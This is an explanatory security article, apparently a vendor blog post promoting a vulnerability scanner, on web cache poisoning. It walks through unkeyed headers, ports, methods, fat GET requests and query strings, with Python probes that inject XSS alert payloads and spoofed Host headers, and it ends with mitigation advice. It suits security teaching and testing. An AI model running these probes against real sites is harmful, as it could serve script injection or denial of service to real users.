What is web caching?
Everyone is familiar with client-side caching by the browser, where content such as static images is temporarily stored locally for quicker loading on your next visit. The same idea applies at higher levels of the content delivery chain. Web servers, intermediate systems, and content delivery networks (CDNs) all use web caching to serve as many client requests as possible without having to retrieve the original content each time.
A modern site can use dozens of content sources, so without intermediate caching, ensuring tolerable and consistent load times would not be possible. Having a cache layer can also help with load balancing. The downside of widespread caching is the added complexity of maintaining multiple intermediate copies of content and keeping them all synchronized with the original. After all, improved performance and stability won’t do much good if clients can’t get the latest content because it isn’t reflected in the cache.
How cache keys work
To determine whether something is already cached, caching servers keep an index of all cached content and use cache keys to look up incoming requests. A cache key is usually a simple string assembled from distinctive parts of a request, yielding a combination of header values (including the request line) that should be enough to tell whether two requests refer to the same cached content. Each caching mechanism has its own way of building the cache key.
The parts of a request that are included in the cache key are called keyed inputs, while the remaining parts are unkeyed inputs. All cache keys include at least the path and host, but depending on the caching mechanism and application, other header values may also be used. Deliberately sending a modified request that definitely won’t be in the cache is called cache busting, a crucial technique for investigating cache-related vulnerabilities and attacks. Using cache busting, penetration testers can experiment with cache poisoning without affecting other users.
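As a simplified illustration of how keyed and unkeyed inputs interact (the exact key format varies by caching engine, so this is only a sketch), the Python snippet below builds a toy cache key from the host, path, and query string, and shows how a tester might append a throwaway query parameter as a cache buster. The parameter name is arbitrary.

```python
import secrets
from urllib.parse import urlsplit

def build_cache_key(url: str) -> str:
    """Toy cache key: host, path, and query string; all other inputs are unkeyed."""
    parts = urlsplit(url)
    return f"{parts.hostname}{parts.path or '/'}?{parts.query}"

def with_cache_buster(url: str) -> str:
    """Append a unique, keyed query parameter so the request never matches an existing entry."""
    separator = "&" if "?" in url else "?"
    return f"{url}{separator}cachebuster={secrets.token_hex(8)}"

print(build_cache_key("https://example.com/home?lang=en"))  # example.com/home?lang=en
print(with_cache_buster("https://example.com/home"))        # .../home?cachebuster=<random>
```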
What is web cache poisoning?
A relatively young technique, web cache poisoning uses a variety of methods to sneak modified (usually malicious) data into a web cache and have it returned to clients instead of legitimate cached content. Modifying cache content is not an attack in itself but merely a technique for delivering payloads, so web cache poisoning is only as dangerous as the underlying vulnerability it targets – typically some form of cross-site scripting (XSS) or host header injection. While not easy to perform, it is also hard to detect and troubleshoot, making it a useful tool for attackers and an important area to cover during penetration testing.
Here are several ways of manipulating caches that, depending on the caching mechanism, application, and browser, may allow web cache poisoning:
Reflected unkeyed headers
If the application directly reflects the value of a certain unkeyed header in the response, it opens an easy avenue to cache poisoning. Because the header is unkeyed, its value is not part of the cache key and plays no part in determining cache hits. If the attacker sends a request where only this header is maliciously modified, the response to this request will be cached, complete with the malicious payload (targeting, for example, a cross-site scripting vulnerability). Users subsequently requesting content that matches the same cache key will receive the malicious version from the cache.
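To make this concrete, here is a minimal Python sketch of how a tester might probe for a reflected unkeyed header while hiding behind a cache buster. The target URL, the X-Forwarded-Host header, and the probe value are all hypothetical placeholders; whether the header is actually unkeyed and reflected depends entirely on the application and the cache in front of it.

```python
import secrets
import requests

# Hypothetical target and header; adjust both for the application under test.
url = "https://example.com/home"
probe = f"probe-{secrets.token_hex(4)}.attacker.example"

# Cache-busted request so the experiment never poisons entries served to real users.
buster = {"cachebuster": secrets.token_hex(8)}
response = requests.get(url, params=buster, headers={"X-Forwarded-Host": probe})

if probe in response.text:
    print("Header value is reflected - a poisoning candidate if the header is unkeyed")

# Hit/miss headers such as X-Cache or Age (if exposed) help confirm caching behavior.
print(response.headers.get("X-Cache"), response.headers.get("Age"))
```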
Unkeyed port
If the port isn’t part of the cache key, it may be possible to perform a denial of service (DoS) attack by poisoning the cache with an inaccessible port number. If the attacker sends a request that includes such a port number and the error response is cached, users requesting the same URL without the port will immediately get the cached error instead of the expected page content. This will render the page inaccessible to users, in effect performing a subtle DoS attack only for a specific URL.
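As a rough sketch (assuming the cache ignores the port when building its key and is willing to store the resulting error or redirect), a tester could check for this behavior roughly as follows. The host and port are placeholders, and a cache buster should be added when testing against live traffic.

```python
import requests

# Hypothetical target; assumes the cache strips or ignores the port in its key.
url = "https://example.com/"

# Claim a bogus port in the Host header while connecting on the normal port.
poisoning_attempt = requests.get(url, headers={"Host": "example.com:1337"})
print("Poisoning attempt:", poisoning_attempt.status_code)

# If the error or redirect was cached, an ordinary follow-up request gets the broken entry.
follow_up = requests.get(url)
print("Follow-up request:", follow_up.status_code, follow_up.headers.get("X-Cache"))
```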
Unkeyed request method
Sometimes, the HTTP request method (GET, POST, PUT, etc.) might not be part of the cache key. If the application is also vulnerable to parameter pollution, it may be possible to send a POST request containing a malicious payload that modifies a parameter, again typically to perform XSS. The poisoned response will then be cached and (because the cache key doesn’t account for the HTTP method) delivered to clients that send a normal GET request matching the same cache key.
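The probe below is a minimal Python sketch of that scenario. The endpoint, the reflected message parameter, and the payload are hypothetical; it only works if the cache really does ignore the request method and the parameter is reflected unescaped.

```python
import requests

# Hypothetical endpoint that reflects the "message" parameter in its response.
url = "https://example.com/greeting"
payload = {"message": "<script>alert(document.domain)</script>"}

# POST the payload; if the method is unkeyed, the poisoned response is stored
# under the same cache key as a plain GET for this URL.
requests.post(url, data=payload)

# A victim's ordinary GET request would then be answered from the poisoned entry.
victim_view = requests.get(url)
print(payload["message"] in victim_view.text)
```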
Fat GET requests
If an application accepts non-standard GET requests that have a body (so-called fat GET requests) and the request body is both unkeyed and reflected in the response, this can present another avenue for cache poisoning. An attacker might then include a malicious payload in the body of a GET request; the response will be cached (because the request body is not part of the key) and users sending a regular GET request that matches the same cache key will receive the poisoned response. In some cases, it may also be possible to use the X-HTTP-Method-Override header to trick the application into treating a fat GET request as a normal POST request.
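A hedged sketch of both variants is shown below. The endpoint and parameter names are placeholders, and success depends on the server actually parsing the GET body (or honoring X-HTTP-Method-Override) while the cache ignores it.

```python
import requests

# Hypothetical endpoint that reflects the "message" body parameter.
url = "https://example.com/greeting"
body = "message=<script>alert(document.domain)</script>"
form_headers = {"Content-Type": "application/x-www-form-urlencoded"}

# Fat GET: a GET request that carries a body (requests allows sending one explicitly).
requests.request("GET", url, data=body, headers=form_headers)

# Variant: ask the framework to process the GET as a POST via X-HTTP-Method-Override.
requests.get(url, data=body, headers={**form_headers, "X-HTTP-Method-Override": "POST"})

# If the body is unkeyed, a victim's normal GET for the same URL gets the poisoned response.
print("<script>" in requests.get(url).text)
```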
Unkeyed query string
Finally, if the query string of a request is unkeyed and reflected in the response, it may be possible to inject a malicious payload into a query parameter and cache the response. Clients sending a matching request with no query string would then receive the poisoned response. Because the attack is a typical script injection, you could say this method is a way of turning reflected XSS into stored XSS, with the script stored in the web cache. While this technique is easy to spot if used directly, it may evade detection in more complex scenarios.
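For illustration only, the sketch below assumes a page that reflects a utm_content query parameter unescaped while the cache excludes the query string from its key; both assumptions, along with the URL and parameter name, are hypothetical.

```python
import requests

# Hypothetical page reflecting the "utm_content" parameter; assumes the
# query string is excluded from the cache key.
url = "https://example.com/news"
params = {"utm_content": '"><script>alert(document.domain)</script>'}

# The response to this request is cached under the query-less key...
requests.get(url, params=params)

# ...so a visitor requesting the bare URL receives the stored payload.
victim_view = requests.get(url)
print("<script>" in victim_view.text)
```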
Preventing web cache poisoning
Web cache poisoning is one of those devious techniques that piggyback on vital web infrastructure. More often than not, disabling web caching is not an option, either for performance reasons or simply because it is too deeply embedded in underlying platforms. Because cache poisoning relies on cache key confusion, it is relatively easy to configure the caching engine to generate cache keys that will thwart at least basic poisoning attempts. In fact, some standalone caching servers (notably Varnish) enable many of these safeguards by default.
To minimize the risk of web cache poisoning, your web cache server configuration should incorporate at least the following practices:
- Normalize the Host header: If your application only uses default ports, strip the port number from the Host header before generating the cache key. This eliminates the risk of poisoning via an unkeyed port value, which can lead to DoS (see the key-normalization sketch after this list).
- Only cache GET and HEAD requests: This reduces the risk of poisoning via an unkeyed request method. POST and other HTTP commands are designed to trigger an operation on the server, so in this case there is no performance benefit to caching responses anyway (because state-changing requests are often unique).
- Don’t allow fat GET requests: Using non-standard GET requests with a body is a dubious practice that can lead to cache poisoning among other security headaches. Caching servers should reject such requests and, wherever possible, applications shouldn’t send them in the first place.
- (Optional) Disable caching headers: While preparing to perform cache poisoning, attackers need to check what kind of caching is used and detect web cache hits and misses. Eliminating caching-specific headers can make their job more difficult (though not impossible) and may be part of a defense-in-depth strategy. Note, however, that disabling these headers might negatively affect client-side caching in the browser.
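The exact directives differ between caching products, so rather than a specific configuration, here is a minimal Python sketch of the kind of key normalization and method filtering described above. The key format and function name are illustrative only.

```python
from urllib.parse import urlsplit

CACHEABLE_METHODS = {"GET", "HEAD"}

def normalized_cache_key(method: str, host: str, path_and_query: str, has_body: bool):
    """Return a cache key, or None if the request should bypass the cache entirely."""
    # Only cache body-less GET/HEAD requests; let everything else pass through uncached.
    if method.upper() not in CACHEABLE_METHODS or has_body:
        return None
    # Strip any port from the Host header before it contributes to the key,
    # assuming the application only serves content on default ports.
    hostname = host.split(":", 1)[0].lower()
    parts = urlsplit(path_and_query)
    return f"{method.upper()} {hostname}{parts.path or '/'}?{parts.query}"

print(normalized_cache_key("GET", "example.com:1337", "/home?lang=en", has_body=False))
print(normalized_cache_key("POST", "example.com", "/home", has_body=False))  # None: not cached
```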
The importance of fixing client-side vulnerabilities
Again, the crucial point about protecting yourself from attacks delivered through web cache poisoning is to find, fix, and avoid vulnerabilities that attackers may target. Cache poisoning is merely another vehicle for malicious actors to deliver their payloads. Even if you are hit by a cache poisoning attempt that injects an XSS payload into the cache, it will be harmless if your application is not vulnerable to that type of cross-site scripting.
By following secure coding practices and using a modern vulnerability scanner at every stage of your development and operations pipeline, you can make sure that you are finding and fixing vulnerabilities before they can make it into production. Netsparker in particular was designed with integration and automation in mind, making it possible to build a reliable DevSecOps process at even the largest scale. Ultimately, building more secure software will protect you and your clients from the consequences of web cache poisoning much better than even the best caching server setup.